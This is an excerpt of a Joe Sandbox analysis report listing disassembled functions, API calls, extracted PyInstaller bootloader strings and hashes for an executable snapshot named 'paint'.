                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                                • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                                                • Instruction ID: 2122c61fddc9ac755c32be2b55d3e5714d38cb3082ddcf2f8103a818439cdb96
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4351D821A1E683B1FB509B60E8516BAA366EF96781FC44031E92FC37D5FE3EE5058740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                                • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                • Instruction ID: 6e1f8c7775155a737b8344f35aab00d046834222019df077205ccdbfd13550fd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6510626604BA186D7249F22E4185BAB7A1FB98B61F004125EBDF83795EF3DD045DB10
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                                • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                                • Instruction ID: a5614849f8203546173ac6eec0ca5a0c0e075c1f7f9dab151b241fa8f974548d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4921E525B09A42D2E7454BBAA854579A255FF8AB92F884130DF3FC33D4FE2DD5858300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                                • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                • Instruction ID: 6f3795f9fda3e88f4eea34e79635956c3c1b7d4a4efaf9c6df4ed329367011db
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4212C276E0C143A6FB249A14E1542B976A1FB527D4FC44175E6AB87BC4FF3EE9808B00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                                • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                • Instruction ID: 205dc92ebd49949720dff3d89ade4fbf1a4ee3d0763243f892527f65f18e6c97
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1812B772E0C143A6FB209A15E0546797261FB82754FE84875D6ABC77C4EF7EE880CB14
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                • Opcode ID: d68df71cf8db1756540facce7fa608ee59de41f47d3402f698371324708d94e4
                                                                                                                                                                                                                                                                • Instruction ID: f3053970c7765fdc275e4e6a1a0df4409fb8cdfbd2eb3e872ea777182c681ac3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d68df71cf8db1756540facce7fa608ee59de41f47d3402f698371324708d94e4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE419425A09653B2EB10DB52A8006B9A396FF46BC4FC44831EE2E877C5EF3EE5458740
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                • Opcode ID: 8bd1f5f2c04e28d282f40171ac874fe6bf77ec46ce63e2dbfd9812a0e69595ca
                                                                                                                                                                                                                                                                • Instruction ID: 6bba4a8ddf6175e95ce4486ca9e9fecd103b7d935a5f7fea0a559699a4d64032
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8bd1f5f2c04e28d282f40171ac874fe6bf77ec46ce63e2dbfd9812a0e69595ca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9418F21A09643B5EB10DB61A4005B9A395EF96788FC44932EE2F87BD5FF3EE541C740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                                • Instruction ID: af8c24269209165b98cb0864f414d9f6bf6914952fe75db10fabfb79404f2578
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82D18332A0974196EB60AF25D4403ADB7A2FB56788F500136EEAE977D5EF39E140C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2C9E
                                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2D63
                                                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF6F0BD2D99
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                                • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                                • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                                • Instruction ID: 74a1d41eeb86fb3bacc1a54d940c81f37d22737b76f742503b2c4ee3a7605bbe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A31E736B08B4162E7209B61A8146ABA696BF85788F810135EF5ED3799FF3DD546C300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDDBD
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDDCB
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDDF5
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDE63
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDE6F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                                • Instruction ID: cd9b4745b9f245c73ef0761b963d4302fbcde324ea49b6a6bd431ce616866e7a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F31B421B1B602A2EF219B52A800675A399FF5ABA0FC94535DD7E8B3C0FF3DE4448304
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                                • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                                                • Instruction ID: 000d3c0ba2a76c19acdfa3f92c70f1ba62d85c5c89aa60ed4ccaf1b4f31aef85
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04418025A19687B1EB21DB64E4152E9A326FF56344FC00132EA6E837D6FF3DE505C740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6F0BD351A,?,00000000,00007FF6F0BD3F23), ref: 00007FF6F0BD2AA0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                                • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                                • Instruction ID: c45071b39fe7a203cf4105d7ff0325b1c81044151180f5b5fbfefcafb3be323a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91218372619782A2E7209B51B4417E6A3A4FB897C4F800131EE9E93799EF3DD1458740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                • Opcode ID: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
                                                                                                                                                                                                                                                                • Instruction ID: bbf68cfa50da0a2ef77e92b39c4dc447a4e2413ee47612c2d0c3431193a22681
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96216820F0C203A2FB686761565153EA6525F467A0F808774EA3FC6BDBFE3EB4008301
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                                • Instruction ID: e38d1d0bbaa1cf34920b9637b55754055e6fecf8fefd53a746e6bffa39d3b7e5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
